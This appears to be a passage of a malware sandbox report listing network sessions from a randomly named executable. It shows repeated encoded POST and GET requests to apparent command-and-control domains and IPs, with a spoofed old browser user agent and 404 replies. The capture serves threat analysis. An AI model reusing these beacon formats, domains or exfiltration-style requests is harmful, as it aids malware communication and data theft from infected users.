                                                                                  Nov 13, 2024 15:34:27.778934002 CET1749OUTPOST /ovl0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.atendefacil.info
                                                                                  Origin: http://www.atendefacil.info
                                                                                  Referer: http://www.atendefacil.info/ovl0/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 68 77 7a 72 75 72 2b 31 32 62 4a 72 42 64 76 32 2b 73 50 4c 74 53 43 63 75 59 2f 35 76 78 2b 63 6b 62 72 67 73 6f 6f 43 58 47 6d 39 7a 4a 6b 4c 4a 6d 68 69 6a 50 6c 4b 78 6c 43 47 52 71 6c 5a 45 51 63 57 33 6c 38 44 4c 30 6f 4f 43 7a 65 4f 74 79 4e 47 5a 37 2f 34 6c 75 50 55 71 41 75 58 50 31 79 4f 42 49 68 65 47 75 38 7a 68 4e 51 44 79 35 44 69 50 47 32 41 38 38 4c 68 76 54 4d 65 74 70 70 46 78 66 72 66 36 59 49 4f 75 45 67 78 54 66 4f 62 35 4c 4d 36 51 52 6e 34 53 38 4a 43 47 34 48 33 4f 72 43 5a 77 7a 57 68 71 36 68 4f 63 45 35 71 58 51 71 67 74 37 31 73 34 6b 4e 32 53 59 72 77 36 77 63 6c 67 31 38 55 4d 6f 70 62 36 41 68 2b 51 63 69 62 62 53 72 37 52 6c 64 41 44 35 34 6d 69 78 42 57 74 50 68 56 6e 74 4c 32 48 31 4f 7a 6a 39 4a 6e 72 6b 69 62 75 33 47 6b 4c 77 79 36 44 34 45 4f 69 41 35 4a 32 61 41 31 38 5a 74 39 50 75 5a 35 52 79 58 45 32 45 4c 75 6a 44 75 72 65 63 7a 4b 62 43 58 73 38 46 46 36 2b 76 37 5a 6f 78 4a 71 4f 4a 56 54 37 6c 42 6f 39 50 37 35 4a 37 77 70 76 68 77 7a 70 51 43 [TRUNCATED]
                                                                                  Data Ascii: 2J=hwzrur+12bJrBdv2+sPLtSCcuY/5vx+ckbrgsooCXGm9zJkLJmhijPlKxlCGRqlZEQcW3l8DL0oOCzeOtyNGZ7/4luPUqAuXP1yOBIheGu8zhNQDy5DiPG2A88LhvTMetppFxfrf6YIOuEgxTfOb5LM6QRn4S8JCG4H3OrCZwzWhq6hOcE5qXQqgt71s4kN2SYrw6wclg18UMopb6Ah+QcibbSr7RldAD54mixBWtPhVntL2H1Ozj9Jnrkibu3GkLwy6D4EOiA5J2aA18Zt9PuZ5RyXE2ELujDureczKbCXs8FF6+v7ZoxJqOJVT7lBo9P75J7wpvhwzpQC51r1ef42bzIm25EeGI5sPvONc2fHRjjtgq5Fx053N8Xv7HJbahLUVFMVCFG6Cfz/aw96MElDeggJi99uvm3F4jlojAr/OLXWbAFWwPFmUvJrD9pC6h+DPIFbIoxS6Dkr5Vgv6HJknI5YjDgkLkk/uIgik3UBawWtgjnLAbNsLadNOrA93ALJkSbE+w8rSJPdmE9UuD8mT9UJ+H6k8YEVDZd6qYFk/KlsIzGV5kCk9YBgKpauyR7f1VIovsFEJpoyhU5cWohv/2si2eGw6QYBxFuwrhVmxdh28uue++VWD6ZNAPNu+en8bCj/MjdfmMsf0jW/7Th9O0V3KXugrzWbE6OSJ2MSxLzl9/i5o+ZnOh9yDx8bJBD2P4XMeLLnSwRhXqJB+kdK2VZN47jQRjMYoQECtP0MlCkdUsu9Xc2Hn89TZq+ZHRhNqTYBBieXUGLweIg4tucVyL/gV4v4ZKvSpq3Yji4SIZdgZMECSirsyMjTagHNYjAbL90MbL7pMprkRwxGles/cQcqnDiRpssynOwl/r5DjPxPJI/IdzpJREfqWfSfRBbP3hyt8xsCgGJ5gYzTFUUP49xsfXrryF74zUfHJWUF22/UGE5NzR/CYB1rwwAe+FP7/MJ+1k13t6kEmJZRVtaM4UMmromMgFytM+A+59CjrDyNTL [TRUNCATED]
                                                                                  Nov 13, 2024 15:34:28.432128906 CET481INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:28 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549986208.115.225.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:30.328169107 CET445OUTGET /ovl0/?2J=sybLtbK8r4s7cIP4xvr2i1/OgqOaozXkrfvLrO0saE7+04sBLyNlnPJsxyiJd448I0Eq3D8MalhBXQ7UwGRoDb3Yk8LIhQCUInzvAK5ePNY01KNz5a/RKEGS8umzny51vQ==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.atendefacil.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:34:30.968936920 CET481INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:34:30 GMT
                                                                                  Server: Apache/2
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549987194.58.112.174803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:36.275343895 CET709OUTPOST /j4lg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sklad-iq.online
                                                                                  Origin: http://www.sklad-iq.online
                                                                                  Referer: http://www.sklad-iq.online/j4lg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 35 6b 75 4f 4d 4e 41 63 75 36 37 61 68 32 49 4c 54 6e 68 35 6f 74 69 2b 55 68 33 48 77 39 31 5a 72 35 68 75 52 47 50 6c 6f 36 58 55 33 78 71 2f 77 73 66 4a 32 32 42 63 32 66 59 6e 2f 59 59 77 73 77 32 77 63 59 48 4b 53 75 68 65 59 2f 54 33 6e 59 77 4e 44 58 6e 38 6d 33 6c 47 46 2f 76 5a 6b 43 55 69 54 32 73 79 56 4f 54 56 39 38 51 30 33 59 55 36 68 38 73 70 42 43 50 6f 65 35 6f 2f 2f 58 2f 57 50 73 51 6c 67 70 4b 79 50 31 63 76 74 73 4a 30 67 70 57 57 72 7a 36 54 35 38 4a 68 48 6e 59 34 4e 4e 4e 70 53 76 68 71 45 76 78 4a 75 79 76 43 58 58 50 65 58 41 45 4c 31 30 61 50 66 37 55 69 41 6f 45 3d
                                                                                  Data Ascii: 2J=5kuOMNAcu67ah2ILTnh5oti+Uh3Hw91Zr5huRGPlo6XU3xq/wsfJ22Bc2fYn/YYwsw2wcYHKSuheY/T3nYwNDXn8m3lGF/vZkCUiT2syVOTV98Q03YU6h8spBCPoe5o//X/WPsQlgpKyP1cvtsJ0gpWWrz6T58JhHnY4NNNpSvhqEvxJuyvCXXPeXAEL10aPf7UiAoE=
                                                                                  Nov 13, 2024 15:34:37.185626030 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                  Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                  Nov 13, 2024 15:34:37.185672998 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                  Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                  Nov 13, 2024 15:34:37.185710907 CET424INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                  Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH
                                                                                  Nov 13, 2024 15:34:37.185740948 CET645INData Raw: 28 1b 73 30 90 64 71 ca 90 6f e8 3b ea 2a 73 fc 99 2a ea ce 70 73 a1 c3 05 56 75 7c 5c 99 5d c2 28 d8 ac 10 47 aa 69 6f 90 a3 cb 40 50 25 57 b1 e6 1a 2d fa fa f6 4b c6 f9 9d ba 79 f6 7d 53 7d af 6f 7f f0 7e bc 73 16 b6 50 c8 28 84 6a 4e 52 b7 13
                                                                                  Data Ascii: (s0dqo;*s*psVu|\](Gio@P%W-Ky}S}o~sP(jNRJ"5Og`by)A%1%)&S=(rlQ(-D)y%>U/MvrlPZ$g("2|Z$+2GelQ&,F=gqB2|d\isb*UU7


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549988194.58.112.174803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:38.814937115 CET729OUTPOST /j4lg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sklad-iq.online
                                                                                  Origin: http://www.sklad-iq.online
                                                                                  Referer: http://www.sklad-iq.online/j4lg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 35 6b 75 4f 4d 4e 41 63 75 36 37 61 75 33 34 4c 53 47 68 35 34 39 69 78 62 42 33 48 36 64 31 43 72 35 74 75 52 45 6a 31 76 49 7a 55 33 54 79 2f 32 59 7a 4a 78 32 42 63 39 2f 59 69 37 59 59 42 73 77 36 43 63 64 6e 4b 53 75 31 65 59 2b 6a 33 6e 70 77 4d 42 48 6e 45 71 58 6c 45 4c 66 76 5a 6b 43 55 69 54 32 34 49 56 4f 4c 56 39 4d 67 30 32 36 38 37 76 63 73 71 47 43 50 6f 61 35 6f 7a 2f 58 2b 44 50 70 74 4f 67 72 43 79 50 78 59 76 74 2b 68 37 35 35 57 71 32 44 36 47 33 65 34 70 66 31 55 4f 41 4e 59 79 53 65 56 6a 4d 35 41 6a 30 51 6e 71 45 33 6a 6d 48 54 4d 38 6b 45 37 6d 46 59 45 53 65 2f 52 7a 67 53 50 4b 77 78 57 32 32 79 51 36 66 6d 55 47 77 31 45 65
                                                                                  Data Ascii: 2J=5kuOMNAcu67au34LSGh549ixbB3H6d1Cr5tuREj1vIzU3Ty/2YzJx2Bc9/Yi7YYBsw6CcdnKSu1eY+j3npwMBHnEqXlELfvZkCUiT24IVOLV9Mg02687vcsqGCPoa5oz/X+DPptOgrCyPxYvt+h755Wq2D6G3e4pf1UOANYySeVjM5Aj0QnqE3jmHTM8kE7mFYESe/RzgSPKwxW22yQ6fmUGw1Ee
                                                                                  Nov 13, 2024 15:34:39.695214987 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                  Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                  Nov 13, 2024 15:34:39.695230961 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                  Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                  Nov 13, 2024 15:34:39.695241928 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                  Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.549989194.58.112.174803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:34:41.756974936 CET1746OUTPOST /j4lg/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sklad-iq.online
                                                                                  Origin: http://www.sklad-iq.online
                                                                                  Referer: http://www.sklad-iq.online/j4lg/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 35 6b 75 4f 4d 4e 41 63 75 36 37 61 75 33 34 4c 53 47 68 35 34 39 69 78 62 42 33 48 36 64 31 43 72 35 74 75 52 45 6a 31 76 49 37 55 32 67 36 2f 31 2f 6e 4a 77 32 42 63 6d 66 59 6a 37 59 59 6d 73 77 53 47 63 64 6a 61 53 74 4e 65 5a 63 37 33 32 74 63 4d 49 48 6e 45 33 6e 6c 46 46 2f 75 64 6b 42 38 6d 54 32 6f 49 56 4f 4c 56 39 4f 34 30 67 59 55 37 74 63 73 70 42 43 50 30 65 35 6f 66 2f 57 61 54 50 6f 39 34 6a 62 69 79 50 52 49 76 76 4e 4a 37 6d 70 57 73 31 44 37 44 33 65 30 6d 66 31 49 34 41 4f 45 63 53 5a 35 6a 66 49 39 6a 68 54 72 49 54 58 71 48 4e 43 4d 66 78 43 54 66 48 5a 45 64 58 6f 68 56 69 68 61 68 34 47 69 54 79 52 56 69 42 79 67 55 69 41 39 31 4b 2b 6d 36 49 76 2f 70 6d 51 41 6b 41 72 41 73 6a 33 58 78 79 5a 49 6f 42 75 6b 74 6b 6b 4e 41 67 71 53 33 4c 53 61 51 37 4c 41 31 39 75 47 72 6f 66 38 49 32 68 53 79 36 2b 6b 74 7a 61 68 5a 31 32 45 34 56 6a 72 2f 54 6f 72 51 32 75 35 4f 69 55 66 54 4e 46 2b 4f 38 47 4a 30 79 63 4e 42 55 2b 4f 75 69 4b 35 53 6e 63 52 7a 77 49 34 74 43 43 79 [TRUNCATED]
                                                                                  Data Ascii: 2J=5kuOMNAcu67au34LSGh549ixbB3H6d1Cr5tuREj1vI7U2g6/1/nJw2BcmfYj7YYmswSGcdjaStNeZc732tcMIHnE3nlFF/udkB8mT2oIVOLV9O40gYU7tcspBCP0e5of/WaTPo94jbiyPRIvvNJ7mpWs1D7D3e0mf1I4AOEcSZ5jfI9jhTrITXqHNCMfxCTfHZEdXohVihah4GiTyRViBygUiA91K+m6Iv/pmQAkArAsj3XxyZIoBuktkkNAgqS3LSaQ7LA19uGrof8I2hSy6+ktzahZ12E4Vjr/TorQ2u5OiUfTNF+O8GJ0ycNBU+OuiK5SncRzwI4tCCyZwL3V3N6oSVUxdfQPv0D1WcgJTM/B7Mxaqkrka3+284yqb7Fk2W4AmDHk9Dt9ZndEA8G6APFrxX4K7Ivh0BFUIgL/2DzmpXFaUBjhgeZVajBo/FxU2qVu3Do2ZBEL7EXtSIKxOMdpJwpat+xJUaJuBcpy9iUNQVglx96g4LLCy3J6ghRVfrAwyMa9JbkK6TgbfTc5XMKt134yUcTlMBUf4REQ45wa5gzCfnZRoNS7K7iD688ZUmquGzCxUxtXYtEjMHiWpvaEyOrNknHoVU/0Mh6I9fdpvRNhZkgWYVpOvmuPehb+UCaSHA5HRCNQaJ0Ou41skDNcjc1bglAQfHUb4byparvz1+1XqCaJGzbEzxj4vNT1jKJrjRh50dI9+FJ87IZ9bEFwlSpYzieRfq9vGgbGoQ06I2ifuwMw6klTOpnJGvbBqOfOIpg/8MKaJfC9x5+e2hkQxbxAUo3PYpzOuN4TDe8fnWpiDFYCkBmsC7vW0yJuIJQtfy8bA4+wXZX7TaJIhkaO1eyTKT2R2p4/3+XNLz2WgA0IfpL8sS2V5tHExZVdE1anXpcFwT2kZ56/AdJ25zNNkUApEgGQdgIoE3xtEcsqGHmPF5fGbG/8IRekr/ws2ByZx1Mk5796X1o88OiSyVSSz2EgQbgl3uE7IjPjcb3LoWqTW [TRUNCATED]
                                                                                  Nov 13, 2024 15:34:42.646076918 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:34:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b 